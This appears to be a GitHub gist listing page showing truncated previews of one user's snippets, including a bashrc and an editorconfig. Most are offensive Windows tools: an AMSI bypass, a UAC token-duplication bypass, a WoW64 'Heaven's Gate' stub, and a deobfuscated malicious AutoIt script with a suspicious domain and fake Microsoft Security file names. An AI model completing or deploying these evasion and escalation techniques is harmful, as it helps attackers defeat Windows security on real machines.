SkyN9ne / UbuntuWSL-bashrc.SH
Last active June 22, 2024 09:57
A bash.bashrc configuration file. Designed originally for usage on Ubuntu
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
[ -z "$PS1" ] && return
# don't put duplicate lines in the history. See bash(1) for more options
# ... or force ignoredups and ignorespace
HISTCONTROL=ignoredups:ignorespace
#!/usr/bin/env bash
PREFIX=${PREFIX:-/usr/local}
set -eo pipefail
if ! which gh >/dev/null; then
echo "gh is not installed. Please install gh and try again."
echo "See https://github.com/cli/cli"
exit 1
# Windows God Mode
Create a folder anywhere you want a shortcut to
every setting imaginable called `GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}`
That's it. I got this from Twitter or something.
SkyN9ne / .editorconfig
Last active June 3, 2024 20:33 — forked from cmbaughman/.editorconfig
Editor Config
[*]
charset = utf-8
end_of_line = lf
indent_size = 2
indent_style = space
insert_final_newline = true
trim_trailing_whitespace = true
quote_type = single
### Frontend files
SkyN9ne / amsi-bypass.ps1
Last active June 1, 2024 20:25 — forked from FatRodzianko/my-am-bypass.ps1
small modification to Rasta Mouse's AmsiScanBuffer bypass to use bytes. Uses different opcode bytes
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
SkyN9ne / Malware.au3
Created June 1, 2024 14:09
Malicious AutoIt3 script (deobfuscated)
Global $susp_domain_1 = "googleads.publicvm.com"
Global $int_223 = 223
Global $string_C:\MicrosoftSecurity = "C:\MicrosoftSecurity"
Global $susp_file_lnk_1 = "MicrosoftCMD.lnk"
Global $string_microsoft = "Microsoft"
Global $string_microsoftsecurity = "Microsoft Security"
Global $string_microsoftsecurity_exe = "MicrosoftSecurity.exe"
Global $int_4 = 4
Global $string_vbs = "vbs"
Local $string_zeus = "Zeus"
SkyN9ne / deobfuscate.py
Last active June 1, 2024 11:31 — forked from AmgdGocha/deobfuscation.py
Deobfuscates strings
#!/usr/bin/env python
def deobfuscate_strings(numbers_string, substract_number):
    result = ''
    numbers_list = numbers_string.split('.')
    for number in numbers_list:
        result = result + chr(int(number) - int(substract_number))
SkyN9ne / WoW64_call.cpp
Created May 22, 2024 02:25 — forked from Cr4sh/WoW64_call.cpp
WoW64 Heaven's Gate
#include "stdafx.h"
#define DB(_val_) __asm __emit (_val_)
#define INVALID_SYSCALL (DWORD)(-1)
// code selectors
#define CS_32 0x23
#define CS_64 0x33
void TestCopy()
{
BOOL cond = FALSE;
IFileOperation *FileOperation1 = NULL;
IShellItem *isrc = NULL, *idst = NULL;
BIND_OPTS3 bop;
SHELLEXECUTEINFOW shexec;
HRESULT r;
do {
SkyN9ne / UAC-TokenMagic.ps1
Created May 22, 2024 02:21 — forked from Cr4sh/UAC-TokenMagic.ps1
UAC Token Magic
function UAC-TokenMagic {
<#
.SYNOPSIS
Based on James Forshaw's three part post on UAC, linked below, and possibly a technique
used by the CIA!
Essentially we duplicate the token of an elevated process, lower its mandatory
integrity level, use it to create a new restricted token, impersonate it and
use the Secondary Logon service to spawn a new process with High IL. Like
playing hide-and-go-seek with tokens! ;))